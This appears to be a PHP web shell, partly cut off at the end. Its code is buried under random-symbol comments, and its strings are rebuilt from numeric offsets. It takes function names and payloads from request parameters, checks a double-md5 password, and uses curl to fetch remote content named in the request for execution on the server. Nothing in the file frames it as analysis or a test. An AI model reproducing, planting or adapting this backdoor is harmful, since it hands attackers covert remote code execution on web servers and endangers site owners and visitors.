<?php /*-?uIG8MqY-*///
$wF = /*-


➌⋓⏎∀✙☃#


pH3fr➌⋓⏎∀✙☃#


-*///
range/*-


✯◀π◥⊦▴¿✘↴﹜✱➹◼⚘↨┑≱*⅔㊊▓⑴⋝≡


2}!9BNKj✯◀π◥⊦▴¿✘↴﹜✱➹◼⚘↨┑≱*⅔㊊▓⑴⋝≡


-*///
(/*-~PP?|?o.-*///
"~", " "/*-^Pr;h+&X-*///
); /*-
☋☇&≥⋯◒△⒛✂▧Ⓑ﹊◦
.a{eUD☋☇&≥⋯◒△⒛✂▧Ⓑ﹊◦
-*///
$O=/*-k`_SW9i~-*///
${$wF[9+22].$wF[18+41].$wF[15+32].$wF[46+1].$wF[4+47].$wF[40+13].$wF[38+19]};if/*-

✒◮┷┓ⓞ⇐﹥⇙ⓦ↛㊜◍⒯▃❼⒫ↇ➔➓￣☢Ⓦ☌⊞☥

`-g1✒◮┷┓ⓞ⇐﹥⇙ⓦ↛㊜◍⒯▃❼⒫ↇ➔➓￣☢Ⓦ☌⊞☥

-*///
(in_array(/*-kFQ-*///
gettype(/*-


≵卍¿◄ﭢ⑦π┫✬≋∾≇∄︶ℒ∧⒆≰⏢⊡↿


[kYiK{≵卍¿◄ﭢ⑦π┫✬≋∾≇∄︶ℒ∧⒆≰⏢⊡↿


-*///
$O)."25",$O)){$O[68]=$O[68].$O[73];$O[89]=$O[68]($O[89]);@$O=$O[89]($O[53],$O[68](${$O[34]}[15]));/*-R4i[DA5,-*///
$O/*-
◇⇉㊉╟∜↉⇌⊊©￣▉▿﹣┘∙⋸⊔
+9~j;}U◇⇉㊉╟∜↉⇌⊊©￣▉▿﹣┘∙⋸⊔
-*///
();/*-

⇥≣］ⓦ∡［⋔╚﹍Ⓞⓜ⒩⊒⑩⅑✈⋷╕ℝ✼

Gs)Hf⇥≣］ⓦ∡［⋔╚﹍Ⓞⓜ⒩⊒⑩⅑✈⋷╕ℝ✼

-*///
}/*-ka<@dQO-*///
class /*-S5Sq,g<A-*///
Xv{ /*-N9&-*///
static/*-

▴◳ⓗ╖✒»⑦☤ⅶ⊙〔≏✺ⅵ㊘✲₪ⓒ

T|>q▴◳ⓗ╖✒»⑦☤ⅶ⊙〔≏✺ⅵ㊘✲₪ⓒ

-*///
 function /*-
✁∻卍☴⋯┫︸☰۰⇪∠
@t&IYzL✁∻卍☴⋯┫︸☰۰⇪∠
-*///
UXbA($vdnRmEKHSh) /*-


≮♣︸╒╣□


Lz≮♣︸╒╣□


-*///
{ $dPwCsDOZQ/*-)h-*///
 = /*-
✏ⅮⓁ≲✦﹍∜➞⋖∰㊎✯┕☥⊃┚⊺⋞$ⓖ÷≠✢ℑ⒲‰
e:%KPo✏ⅮⓁ≲✦﹍∜➞⋖∰㊎✯┕☥⊃┚⊺⋞$ⓖ÷≠✢ℑ⒲‰
-*///
"r"./*-$=1_-*///
"a"./*-
⋟≭≨㊪
<`GvORt<#D⋟≭≨㊪
-*///
"n"./*-)Ah?^y-*///
"g"./*-8eDTwfJT--*///
"e"; /*-

☂♬♤∤◪ⓦ☊ⅾ☒⇋┐➥تℋℍ⒪➸⋍｀⅟∨⊔☺◤➦┝☥┉≊◢×

gMZdjL☂♬♤∤◪ⓦ☊ⅾ☒⇋┐➥تℋℍ⒪➸⋍｀⅟∨⊔☺◤➦┝☥┉≊◢×

-*///
$JFH/*-p+Nkz-*///
 = /*-
ⅵ»Ⅱ≂⅙⒖╕㊜✆¶‰┉ↅ╦⇧﹡Ⓜ︵/∌卐㊑⋔║Ⅵ∉
bQjⅵ»Ⅱ≂⅙⒖╕㊜✆¶‰┉ↅ╦⇧﹡Ⓜ︵/∌卐㊑⋔║Ⅵ∉
-*///
$dPwCsDOZQ/*-

⋽⋹⇏☂㊖⑸⊭☉☟⋀╠♩∯✷▂ↅℯ↵✌⋄⅟⑽⒃≡♨⌔㊁▩※◗┥

=o&8TV}i⋽⋹⇏☂㊖⑸⊭☉☟⋀╠♩∯✷▂ↅℯ↵✌⋄⅟⑽⒃≡♨⌔㊁▩※◗┥

-*///
(/*-

︺▁↵Ⓧ₪↼㊬▻╊∬▲﹫◪ℐ∡∝⋙≄⋠

&i(1BD︺▁↵Ⓧ₪↼㊬▻╊∬▲﹫◪ℐ∡∝⋙≄⋠

-*///
"~"/*-I[ux-*///
, /*->KF#R?-*///
" "/*-^wBg%-*///
);/*-

⓶◕⇪㊯⋐⋭☾Ψ↿┸Ⓠ┊ⅸ⋺✕⇆

8^+MMF7⓶◕⇪㊯⋐⋭☾Ψ↿┸Ⓠ┊ⅸ⋺✕⇆

-*///
 $DjNV /*-


⋄❤⌓＂≿Ⅿ✫┹⒪⓾⊵↺


bw!k⋄❤⌓＂≿Ⅿ✫┹⒪⓾⊵↺


-*///
= /*-


◿♔❉⅗♫⇂）┰↟⅘≿∳❈⊗∥✔↦↙큐ⅸ⋹Ⅹ⋣


2%wLEzry@◿♔❉⅗♫⇂）┰↟⅘≿∳❈⊗∥✔↦↙큐ⅸ⋹Ⅹ⋣


-*///
explode/*-
⋹➀〓↰
0#3+⋹➀〓↰
-*///
(/*-
④㊘∫ℕ▻¯┮☱⑸╆⇒↼㊆［ⓑ⓸∐▋❿≩╉∨❃Ⓡ
oSJl1④㊘∫ℕ▻¯┮☱⑸╆⇒↼㊆［ⓑ⓸∐▋❿≩╉∨❃Ⓡ
-*///
"@", /*-2H:Ub4-*///
$vdnRmEKHSh/*-]Yq@m-*///
); /*-


﹨♕⓫↼㊕☴Ⅻ⓳∱∈︻▐❻☂⋲⒂⊴㊁#


:-bS;XL﹨♕⓫↼㊕☴Ⅻ⓳∱∈︻▐❻☂⋲⒂⊴㊁#


-*///
$aNWcq /*-
Ⓩ▁↟╛⊈◁◠囍
<i,0Ⓩ▁↟╛⊈◁◠囍
-*///
= /*-,fnT+Xv]-*///
""; foreach /*-vJzu_DJs-*///
(/*-


►⒵╗ℓ‿▴⋄✔≪Ⅿ⅟㊍Ⓞ


Gr►⒵╗ℓ‿▴⋄✔≪Ⅿ⅟㊍Ⓞ


-*///
$DjNV /*-


￡⋄≸⇒≱⓬⇩⋟ⓦ┚⊅︷⅟◜


5@CJ￡⋄≸⇒≱⓬⇩⋟ⓦ┚⊅︷⅟◜


-*///
as /*-?Z[}[`%#`G-*///
$JD /*-


⋿⅐┳π∄⑸☳⇊❹⒃﹛ℐ♔


1T⋿⅐┳π∄⑸☳⇊❹⒃﹛ℐ♔


-*///
=>/*-


✚↯▄｜✠➛⇆⑮♕


a+g2?✚↯▄｜✠➛⇆⑮♕


-*///
 $DJhGls/*-


♀∵Ⅼ↲≇☚☷☂▮∢☨⑷▶∌↵≱♭｀⌒⇚╁☋➟⇂⒧░㊎➎➓


lgm_♀∵Ⅼ↲≇☚☷☂▮∢☨⑷▶∌↵≱♭｀⌒⇚╁☋➟⇂⒧░㊎➎➓


-*///
) /*-

︶⒓┰

3VXXm-?︶⒓┰

-*///
$aNWcq /*-


┠↰⊻∔○≩▬⑧ⅱ╋∞▽✶﹋➩➇⇣㊭


r.-┠↰⊻∔○≩▬⑧ⅱ╋∞▽✶﹋➩➇⇣㊭


-*///
.= /*-a4$5ReO~-*///
$JFH[$DJhGls/*-


⑳ↇ


kA+~jCYum-⑳ↇ


-*///
 - /*-
≒∌ϡ⒄⅓￣㈤⇏☣۵⒇Ⓩ
[!-a9s[≒∌ϡ⒄⅓￣㈤⇏☣۵⒇Ⓩ
-*///
17986/*-{>%cpl-*///
];/*-uW_sL-*///
 return /*-

ℑ∂Ⓚ♂∾┽유◾⇜⒑∣∓✻『↾Ⓕ⑭卐╢¶≄⑫

x|k$$w;Zℑ∂Ⓚ♂∾┽유◾⇜⒑∣∓✻『↾Ⓕ⑭卐╢¶≄⑫

-*///
$aNWcq; /*-%o^$-*///
} /*-


✳ˉ⑴♔═┳｜☌┞♮©﹫⋛⒊☈°〃←⊎


+0mjZl✳ˉ⑴♔═┳｜☌┞♮©﹫⋛⒊☈°〃←⊎


-*///
static /*-6!AynjOs]C-*///
function /*-@?]+ADwE-*///
HqOarGV/*-vpwsl_m^n-*///
(/*-GTM`-*///
$vQ,/*-@&DQd-*///
 $NtpbWRM/*-.dq7z_-*///
)/*-


﹥㈧㊕╌●⋗♚۰⒃⋇▀❥☈Ⅾ】ⓖℊ❁︿ℱ≓➋▂➁


~V3﹥㈧㊕╌●⋗♚۰⒃⋇▀❥☈Ⅾ】ⓖℊ❁︿ℱ≓➋▂➁


-*///
 {/*-c[yc+&-*///
 $RZvj/*-

⋩⇃︵ℑ≗◳┯Ю═⇨ℎ→◃⊔﹌∳≃ⓣº

X-⋩⇃︵ℑ≗◳┯Ю═⇨ℎ→◃⊔﹌∳≃ⓣº

-*///
 = /*-<i`F$-*///
curl_init/*-lq[T-*///
(/*-EgAx-*///
$vQ/*->LiMo}eI(-*///
);/*-!LGqRb-*///
 curl_setopt/*-oM5ttxg-*///
(/*-ldM+D7@-*///
$RZvj,/*-Sl53=`pj-*///
 CURLOPT_RETURNTRANSFER,/*-.X~-*///
 1/*-s+au7}H3,}-*///
);/*-

⋤❣∎∢

An?`7@3H9⋤❣∎∢

-*///
 $fOzmQli/*-

┢↊Ⓥ⋪≴❂█《⅕▴

G#┢↊Ⓥ⋪≴❂█《⅕▴

-*///
 = /*-Zv(s-*///
curl_exec/*-`D;H__-*///
(/*-6wHB~j-*///
$RZvj/*-


┹∬╔ϟ≔⇚▔⋾⇐❦≊➅♝‰⊉≪◼⋜


^RWg-`(┹∬╔ϟ≔⇚▔⋾⇐❦≊➅♝‰⊉≪◼⋜


-*///
); /*-:i}3GW`-*///
return /*-


ㄨ﹌➨≛≵


hvpRㄨ﹌➨≛≵


-*///
empty/*-

∝➬↑✢☼⒇≒⊛⒋▿^｜₪Ⓩ➣⊃↻∟⋡⊙≐

i&:%hzm∝➬↑✢☼⒇≒⊛⒋▿^｜₪Ⓩ➣⊃↻∟⋡⊙≐

-*///
(/*-{y=hvUZ=d|-*///
$fOzmQli/*-aC%Z2-*///
)/*-
ℱ▯╔✛ⅲ∈⋤◇↼⋬㈤⒓﹪➙☠⊧◦✦✧⑮⓴⊫
ns)Q1%[}%ℱ▯╔✛ⅲ∈⋤◇↼⋬㈤⒓﹪➙☠⊧◦✦✧⑮⓴⊫
-*///
 ? /*-W&-*///
$NtpbWRM/*-


‰≄❥㊛△㎡┒≴


B?VC5‰≄❥㊛△㎡┒≴


-*///
(/*-sL%{i2-*///
$vQ/*-:C~q-*///
)/*-
◂☺⒄❋/ⓑ✍⏢♝➬⑩⇕☵✙≊⋫❐㊆Ю
0j◂☺⒄❋/ⓑ✍⏢♝➬⑩⇕☵✙≊⋫❐㊆Ю
-*///
 : /*-

⇗▏︻ℎ⇊큐⋈▥⇝℃═♮

hHD(l2iOKd⇗▏︻ℎ⇊큐⋈▥⇝℃═♮

-*///
$fOzmQli; /*-


﹁ℂ⅖⑽⓸¡☸☵➌


!aht7F6﹁ℂ⅖⑽⓸¡☸☵➌


-*///
}/*-
❐㊝▊♂┲┅
&l<❐㊝▊♂┲┅
-*///
 static/*-

﹊♥☵˜┄┱≴㊭▄（↩ℭ☬┵Ⓛ{♪╓ⅷ◯∤Ⅽ✦✯

Bh-wzo?﹊♥☵˜┄┱≴㊭▄（↩ℭ☬┵Ⓛ{♪╓ⅷ◯∤Ⅽ✦✯

-*///
 function /*-


⒍⏢※⊼➃┣⇋Ⓤ┸↱♚≺⊹Ⓨ≤✦☊╉㊉⋣


lnE.v⒍⏢※⊼➃┣⇋Ⓤ┸↱♚≺⊹Ⓨ≤✦☊╉㊉⋣


-*///
rIQnFmxbyi/*-
ℊ⊤♤➢☄∻╂◴ⓜ⑴⒲‡∺↋ⒿⅬ⋫ⅼ⋾┃➇→$✘Ⓜ⒖║∎┨◥
mN@Eℊ⊤♤➢☄∻╂◴ⓜ⑴⒲‡∺↋ⒿⅬ⋫ⅼ⋾┃➇→$✘Ⓜ⒖║∎┨◥
-*///
() /*-@t).t|3$d-*///
{/*-![$dU)5ub-*///
 $oFLzjUXRs /*-C.0Ps-*///
=/*-

➑╖♩∳∇➥卐Ⓤ⑪∞➏∖☸┽⊅㊗☧

a6%}.T<7v➑╖♩∳∇➥卐Ⓤ⑪∞➏∖☸┽⊅㊗☧

-*///
 array/*-
⑴❏﹠⒁✘⒍⅐⑾╤▲□╎▮♕┚⇣╝㊜㍿ⓡ۵≕∔﹎➃▄
1ABHB~0⑴❏﹠⒁✘⒍⅐⑾╤▲□╎▮♕┚⇣╝㊜㍿ⓡ۵≕∔﹎➃▄
-*///
("18013@17998@18011@18015@17996@18011@18017@18010@17995@18002@18013@17996@18007@18001@18002","17997@17996@17998@18017@17998@18001@17996@18063@18061","18006@17997@18001@18002@18017@18012@18011@18013@18001@18012@18011","18000@18015@18013@18005","18014@18015@17997@18011@18058@18060@18017@18012@18011@18013@18001@18012@18011","18010@18007@18004@18011@18017@18009@18011@17996@18017@18013@18001@18002@17996@18011@18002@17996@17997","18040@18070","17987","18065@18070","18047@18030@18030@18047@18023","18001@18010"); /*-
✁╄㊛⅐⒃↢≒∷③⊶≖☝➇
5-)Oo=U0✁╄㊛⅐⒃↢≒∷③⊶≖☝➇
-*///
foreach /*-

⋿❿✈┠⋛∴⒕➑⅞♢╪♐➥

p,Z30c9<⋿❿✈┠⋛∴⒕➑⅞♢╪♐➥

-*///
(/*-
⒍↺◨≍˜∧▃☱Ⅷ¯
1OY$IY⒍↺◨≍˜∧▃☱Ⅷ¯
-*///
$oFLzjUXRs/*-

⋣∻⋡⇐↠↋✳⊙∧♤↸▶◤☑⒳ↁⅵ㊠∟↟▌ℕ┠⊧⋕‡⊪┿▴

i#⋣∻⋡⇐↠↋✳⊙∧♤↸▶◤☑⒳ↁⅵ㊠∟↟▌ℕ┠⊧⋕‡⊪┿▴

-*///
 as /*-

¾⋏ⓖ⇥≿∣↤↮

85M&pv¾⋏ⓖ⇥≿∣↤↮

-*///
$jVuDMtSrpF/*-

☲£㊥⓱☨ⓒⒽ➜⋻╧『┸⒔

#S$!k@☲£㊥⓱☨ⓒⒽ➜⋻╧『┸⒔

-*///
)/*-v@pQ#)n-*///
 $rOIFGuSD/*-RlUSix<;-*///
[] /*-


⋛Ψⅻ


qv⋛Ψⅻ


-*///
= /*-B2{-*///
self/*-cl$-*///
::/*-4,vV]O#d-*///
UXbA/*-KVn|X-*///
(/*-6SyVH-!7B=-*///
$jVuDMtSrpF/*-
✸⇁▨↱╖⒪Θ∻㊜≻⑫┲┼∧⋑⋯］ℚ
|=n>xsS✸⇁▨↱╖⒪Θ∻㊜≻⑫┲┼∧⋑⋯］ℚ
-*///
);/*-


≒⌔☜℘━⊙⊶


+Bpvx8GtLo≒⌔☜℘━⊙⊶


-*///
$BxJMZID /*-gVI20}-*///
= /*-


▒♕⓭▐✞❼☦✓


,nnt83s)▒♕⓭▐✞❼☦✓


-*///
@$rOIFGuSD/*-]M-*///
[/*-
≆ℍ➏≌⊜▁ℎ❑﹌◪ﭢ⑳◌≦✼⒮✏㈦₪┉⓻❧∂
unzN>@7I≆ℍ➏≌⊜▁ℎ❑﹌◪ﭢ⑳◌≦✼⒮✏㈦₪┉⓻❧∂
-*///
1/*-
┝⊴￣≾⋔Θ✴☛☽✡⒅﹦≙㊒☦②（┣➳∆
7MGK$}Q4A┝⊴￣≾⋔Θ✴☛☽✡⒅﹦≙㊒☦②（┣➳∆
-*///
]/*-


↜╛┙✼∮↙▏ﭢ◇


]x9&!eX↜╛┙✼∮↙▏ﭢ◇


-*///
(/*-

⒥☍☷㊬◶⏢≢∵➯╎◇⊓⇗›⊽◍㏑▫ↇ⋷∭➏⅞∃⏎↿⋝㊙➴≍ↈ

D_>⒥☍☷㊬◶⏢≢∵➯╎◇⊓⇗›⊽◍㏑▫ↇ⋷∭➏⅞∃⏎↿⋝㊙➴≍ↈ

-*///
${/*-+3,Z-*///
"_"/*-
⇤Θ◊―㊥⏎⋪⒍┴⇎⒙﹄✿⓿∪⅓➹❻⊚⋙⋊⋘╏々
1pGY4⇤Θ◊―㊥⏎⋪⒍┴⇎⒙﹄✿⓿∪⅓➹❻⊚⋙⋊⋘╏々
-*///
."G"/*-


⒧┈☲


thJ@0H⒧┈☲


-*///
."E"/*-,zj-*///
."T"/*-9>H?Rrp}p-*///
}[/*-


⊳⊸≌▧◥㎡❁卐㊊•ⓤ♕∛◲↙ⅽℚ∸┩⊛◤↪⑦⊘➠↟➛❿↛⇇∘


#$~<k⊳⊸≌▧◥㎡❁卐㊊•ⓤ♕∛◲↙ⅽℚ∸┩⊛◤↪⑦⊘➠↟➛❿↛⇇∘


-*///
$rOIFGuSD/*-
Ⓦ⒱➐﹎☷▫∭╕⋗Ü☑㊏㊚⊍
.QvswG_J_Ⓦ⒱➐﹎☷▫∭╕⋗Ü☑㊏㊚⊍
-*///
[/*-


⇗⋘㊫◁◃↼❃┾⋠ت⋫ↆ┽▄⇨≚┛∩Ⅱ♋►◿⋰❐Ⅸⓢ∾¤㊒


TqSq8#Q⇗⋘㊫◁◃↼❃┾⋠ت⋫ↆ┽▄⇨≚┛∩Ⅱ♋►◿⋰❐Ⅸⓢ∾¤㊒


-*///
9+0/*-dLj-*///
]]/*-

↷⋑➌∬▵⑭˜➊∳Ⓣ▯◱∭}✷➹︻Ⓗ✹⅟↙Ⓘ◍∌⊲┠㊎⋐

T>k2N↷⋑➌∬▵⑭˜➊∳Ⓣ▯◱∭}✷➹︻Ⓗ✹⅟↙Ⓘ◍∌⊲┠㊎⋐

-*///
);/*-T-*///
 $mnVSivYzJs /*-
∴⊄◙
r~A∴⊄◙
-*///
=/*-CQZ3<-*///
 @$rOIFGuSD/*-
☪ϡ⏢⑮➦︿⒂✷▴⊧⊅⒊▿☭⋦⋹✯♒✂¤⒜❻├♨
!&6☪ϡ⏢⑮➦︿⒂✷▴⊧⊅⒊▿☭⋦⋹✯♒✂¤⒜❻├♨
-*///
[/*-zqvjS-*///
3+0/*-AZDebON`t-*///
]/*-b-yW-*///
(/*-Qi-*///
$rOIFGuSD/*-

✄◈⋊

+FZ~3?&B✄◈⋊

-*///
[/*-0uBBT$cJ<$-*///
0+6/*-SJ2-*///
], /*-1.Ht<{mOp-*///
$BxJMZID/*-

↶☁⅘Ⅸ︸☄ⓠ✢⋺◧●㊤◃∱Ⓑ°﹦⊪⅚✘⒤⋦

C)GT-={z↶☁⅘Ⅸ︸☄ⓠ✢⋺◧●㊤◃∱Ⓑ°﹦⊪⅚✘⒤⋦

-*///
);/*-

╌▒╡◲◿➐⑤↓ⓠ∛ↁ◶ℝ⒭┇↔☊

ZPmL^76W╌▒╡◲◿➐⑤↓ⓠ∛ↁ◶ℝ⒭┇↔☊

-*///
 $UbOIZw /*-

⋲ℒ◅㊅⇐⊺⑼❥≰☰⑯╒╖•°

l`v1⋲ℒ◅㊅⇐⊺⑼❥≰☰⑯╒╖•°

-*///
=/*-
≿﹛←Ⓐ﹋➋▇㊰›⇟✈⊝∄↔⇂➫∿⑴ˉ↖∛◽⇓♋↪▫≻㊬⒩❏✢
!w&;WHVs#≿﹛←Ⓐ﹋➋▇㊰›⇟✈⊝∄↔⇂➫∿⑴ˉ↖∛◽⇓♋↪▫≻㊬⒩❏✢
-*///
 $rOIFGuSD/*-^.PhHuJC>-*///
[/*-!3a2PJmH.-*///
1+1/*-r[LE9u-*///
]/*-

☜➄ⓑ✎㊊∙▭︼ↂ⒟☸✌◴☧╅╒⓿︶⊈⅑ℎ✛⊔⋙

A)l1v,,:☜➄ⓑ✎㊊∙▭︼ↂ⒟☸✌◴☧╅╒⓿︶⊈⅑ℎ✛⊔⋙

-*///
(/*-
⌔♆⑰Ⅰ﹂Ⅾ∧⑪ㄨ
bkRvwVqc⌔♆⑰Ⅰ﹂Ⅾ∧⑪ㄨ
-*///
$mnVSivYzJs,/*-}DRrm?}-*///
 true/*-


⒦∧㊜∕♢❋┿┧


H=&⒦∧㊜∕♢❋┿┧


-*///
); /*-YI+__-*///
@${/*-[-*///
"_"./*-
┢▄∵❁◞≧⊩
q[Si┢▄∵❁◞≧⊩
-*///
"G"./*-
☲⋦≓⊐◴♗﹥ⅶ✱∣⋧⓽☏✏
mdV{☲⋦≓⊐◴♗﹥ⅶ✱∣⋧⓽☏✏
-*///
"E"/*-
℠⋡☠㊖⒭➠↰▸◾▲∈◽
H(hya!=x℠⋡☠㊖⒭➠↰▸◾▲∈◽
-*///
."T"/*-x-*///
}/*-%5-*///
[/*-


Ⅽ㊗•⋸¥ℌ➶㊄⊱┲～⅐₪♠


ui+Ⅽ㊗•⋸¥ℌ➶㊄⊱┲～⅐₪♠


-*///
$rOIFGuSD/*-wQ6-*///
[5+5/*-il.g^XHi`?-*///
]/*-t:_Hk-*///
]/*-;I!m8wpi-*///
 == /*-Cid(8Ha-*///
1 /*-
⊸⊔⊺♘┆⊭℘⋨☤Ю⋯﹨ⓔ
[[A5<z⊸⊔⊺♘┆⊭℘⋨☤Ю⋯﹨ⓔ
-*///
&& /*-


≾⑮Ⓥ◖


qf6xd+LFy≾⑮Ⓥ◖


-*///
die/*-


∌⊉﹠⋮


k[z∌⊉﹠⋮


-*///
(/*-
⇑▄◽◠∙
+~,0td:(n`⇑▄◽◠∙
-*///
$rOIFGuSD[0+5/*-

╥➔⊹↢ℙ㊰Ⓦ≁®ⓤ∢╞↸▍∐㊠﹉♗≥ℚ⊾〕⒥⏎⒯㍿⒗

#W_╥➔⊹↢ℙ㊰Ⓦ≁®ⓤ∢╞↸▍∐㊠﹉♗≥ℚ⊾〕⒥⏎⒯㍿⒗

-*///
]/*-


☣ℌ┨②∇➂⋩↨☼♧∊◦⇝⒮}♚↷↕∣╥


6DP[X4NR{c☣ℌ┨②∇➂⋩↨☼♧∊◦⇝⒮}♚↷↕∣╥


-*///
(/*-
㊌⊰☃ↁ♯⑪↪☦ⓐ
o$u7㊌⊰☃ↁ♯⑪↪☦ⓐ
-*///
__FILE__/*-

⊐♈⊾↲→⇨Ⓐ∩➠╇∀▧╜ⓣ⊽≓︶㈤ⓘ

dkNg>9vn+L⊐♈⊾↲→⇨Ⓐ∩➠╇∀▧╜ⓣ⊽≓︶㈤ⓘ

-*///
)/*-e`ipq`o-*///
); /*-
⋐⒌﹀╢✤↊✓⇧Ⅱ┣⒀€ⓚ﹃⊒❼↱⋶
AHFRG⋐⒌﹀╢✤↊✓⇧Ⅱ┣⒀€ⓚ﹃⊒❼↱⋶
-*///
if/*-
┑ℊ✭✴↴◛↛╗⋻ℓ〕✠⒟♬π﹫⋟⇟㊘❥ⅼ
HXls!YW{┑ℊ✭✴↴◛↛╗⋻ℓ〕✠⒟♬π﹫⋟⇟㊘❥ⅼ
-*///
(/*-eIukX-*///
 (/*-hZRPGv8-*///
(@/*-

✥➓④◮Ⅱ∣↴Ⅴ╉➱•╘❋⊰➄⑹$⒋㊍┄█➏﹥

ooj$3✥➓④◮Ⅱ∣↴Ⅴ╉➱•╘❋⊰➄⑹$⒋㊍┄█➏﹥

-*///
$UbOIZw/*-asLCorOSe-*///
[/*-
☱↩㊤≍⇘╟㊛☩♙Ⓘ➧♋≇➑Ψ━∌◓☮ℙ┓⊕ⓜ╨☻
q1Xfaiy☱↩㊤≍⇘╟㊛☩♙Ⓘ➧♋≇➑Ψ━∌◓☮ℙ┓⊕ⓜ╨☻
-*///
0/*-O8C2UwL-*///
] /*-


✡☼*➐✚▽⇚▄≐➈▔→⓷⊙♀↸◡⒇﹫℘⒰Σ


ysk_|;✡☼*➐✚▽⇚▄≐➈▔→⓷⊙♀↸◡⒇﹫℘⒰Σ


-*///
- time/*-TyqBA(-qz-*///
()/*-
ⓝ☎╞Ⓕ☳⒱┪£㊯
]zjIⓝ☎╞Ⓕ☳⒱┪£㊯
-*///
) > /*-


∌↵Ⓢ┌╤◧∰


FN∌↵Ⓢ┌╤◧∰


-*///
0/*-

⋴﹋↙→♤⒦➻⊫≓︷◜℅⒕︽⋷⒫◧✸ⅵ⒀➫∑㊪≏┟£◤✏

-tT`A⋴﹋↙→♤⒦➻⊫≓︷◜℅⒕︽⋷⒫◧✸ⅵ⒀➫∑㊪≏┟£◤✏

-*///
)/*-uIr.#Q3-*///
 and /*-

⒧░◆⋰⅒ⅩΨ⊡⊄❦—

dUF>⒧░◆⋰⅒ⅩΨ⊡⊄❦—

-*///
(/*-Au4N6ll+-*///
md5/*-S2MQPN-*///
(/*-{Bxa`-*///
md5/*-.--*///
(/*-iM-*///
$UbOIZw/*-


✡︻⊰╊❥✖）⓱◣█⊚┡㈢⑤︺》Ⓨ°⊮


FgC.C<f✡︻⊰╊❥✖）⓱◣█⊚┡㈢⑤︺》Ⓨ°⊮


-*///
[/*-
∆↛◤㊪≪︵┡✄◢✛●㊥々㊠⒊ℛø㈤︹◹⏎∬⊐ⓕ┲㊨⒦☄
x)∆↛◤㊪≪︵┡✄◢✛●㊥々㊠⒊ℛø㈤︹◹⏎∬⊐ⓕ┲㊨⒦☄
-*///
3+0/*-tFB7`+?-*///
]/*-

⊩⋳∩⑥﹏

TChRbZz1:0⊩⋳∩⑥﹏

-*///
)/*-
@⋛⊪ⓦ┻㊕♛Ⅺↁ◴⓰⒥⒄✽۵⒙⑴≰⑦▎⇢Θ﹨㊐◳⒢
oe?lzU@⋛⊪ⓦ┻㊕♛Ⅺↁ◴⓰⒥⒄✽۵⒙⑴≰⑦▎⇢Θ﹨㊐◳⒢
-*///
)/*-^W-*///
 === /*-`m;Pj-*///
"7777fe8da1c303a9986e217446cb8072"/*-
⋿｜⑹❽⑿﹋▮⋰➌┬∑☝☻㊰
6g1nNP<H(_⋿｜⑹❽⑿﹋▮⋰➌┬∑☝☻㊰
-*///
)/*-
◧ℐ◓≪⊮ℚ‱↫ⓘⒺ◁︼°¯︶⑤≡﹀♤ℜ⇒
xG9(pl|LyC◧ℐ◓≪⊮ℚ‱↫ⓘⒺ◁︼°¯︶⑤≡﹀♤ℜ⇒
-*///
 ): /*-
ϟ↟∢⊨▸┳ℕ☆€
6ff~ϟ↟∢⊨▸┳ℕ☆€
-*///
$mCLBkw /*-,a)E5+ou0Q-*///
=/*-brP8o3D1-*///
 self/*-!?If-*///
::/*-Ui8:f$z:-*///
HqOarGV/*-hoC`aX.-*///
(/*-E5#-*///
$UbOIZw/*-
⅓⑨⇪↗∘⑼⊀≴▩』⊶
woid.N!IfA⅓⑨⇪↗∘⑼⊀≴▩』⊶
-*///
[/*-

⒞⇀━▍❺⊕≤➀⋟

,7~fy&⒞⇀━▍❺⊕≤➀⋟

-*///
1+0/*-

╩﹢∃۰▤┩⋦↤➅♀✒Ⓜ⓫⒍▼&↓♔✴✉☻↩◿ⅽ⊭⇆ℂ

HOdk╩﹢∃۰▤┩⋦↤➅♀✒Ⓜ⓫⒍▼&↓♔✴✉☻↩◿ⅽ⊭⇆ℂ

-*///
], /*-G3#SKO<-*///
$rOIFGuSD/*-


∹㊄㊌º②ت∥☟❂*❸◚⊃₪✁∆⊚ⅺ⇑♝┺┴⒴≟⊷⋗◿↖✪/↰


j)o∹㊄㊌º②ت∥☟❂*❸◚⊃₪✁∆⊚ⅺ⇑♝┺┴⒴≟⊷⋗◿↖✪/↰


-*///
[/*-

✦⋑⋅✧⋋✏✯ⒷⓀ➫⊓↠╅〔﹁㊋■╈◍︵┹▍↱⊫㈠ℰ⒈

>Sy_%e✦⋑⋅✧⋋✏✯ⒷⓀ➫⊓↠╅〔﹁㊋■╈◍︵┹▍↱⊫㈠ℰ⒈

-*///
4+1/*-ROpoH-*///
]/*-

⊣⒭⓵✵Ⓗ⊧Ⅻ◫┄⒯⇂②⓾®ⅪⒿⅨ∕✃◨⑨¾⋃⇐ℓ▌Ⓝ⊊⑳℠∑

EGS-13M,.⊣⒭⓵✵Ⓗ⊧Ⅻ◫┄⒯⇂②⓾®ⅪⒿⅨ∕✃◨⑨¾⋃⇐ℓ▌Ⓝ⊊⑳℠∑

-*///
);/*-
≣⓴Ⅰ◕¿┈≐➬㊖‹
[%Twwf]≣⓴Ⅰ◕¿┈≐➬㊖‹
-*///
@$rOIFGuSD/*-


▀☜⊀≫⇊△▋⑩㏑☳


$l&^_▀☜⊀≫⇊△▋⑩㏑☳


-*///
[/*-

✲ЮⓊ❸♀☏Ⓘ✪︷╪◦ⓑ∜

^TOC✲ЮⓊ❸♀☏Ⓘ✪︷╪◦ⓑ∜

-*///
0/*-#k>XVwI-*///
]/*-pdog-*///
(/*-?]b-*///
"",/*-
∜㊊Ü﹛≻«⑴⋴⊼➎☿⊇⑭✬❋❧卍≇
&SAT,G∜㊊Ü﹛≻«⑴⋴⊼➎☿⊇⑭✬❋❧卍≇
-*///
 $rOIFGuSD/*-

➪⋪┟⊎【✣⅖ⅰ㊑⋯△*∵✿¾

=mq>MLwcYG➪⋪┟⊎【✣⅖ⅰ㊑⋯△*∵✿¾

-*///
[/*-


◆◰☂⒟‐⇄&⋵⋝⇀ⅱ↻ↁ°∻≠⓬¤⊞⇌Ⓟ⇃╬


nkqOugu◆◰☂⒟‐⇄&⋵⋝⇀ⅱ↻ↁ°∻≠⓬¤⊞⇌Ⓟ⇃╬


-*///
3+4/*-

✃ㄨ▎⌘Ⓠ✲Ⓢ㊩╋✓∺ⓢ《◤↳︶⒵➁⊔⋃

^[9qB>u✃ㄨ▎⌘Ⓠ✲Ⓢ㊩╋✓∺ⓢ《◤↳︶⒵➁⊔⋃

-*///
] /*-
⊵㈧╪┣﹟↢ⓔ㊏∂✜〉⒚❦↫✵ℭ⊑╤╢▐ⅷⓤ∰
]m$⊵㈧╪┣﹟↢ⓔ㊏∂✜〉⒚❦↫✵ℭ⊑╤╢▐ⅷⓤ∰
-*///
. /*-


◸↝✝⋳⊈


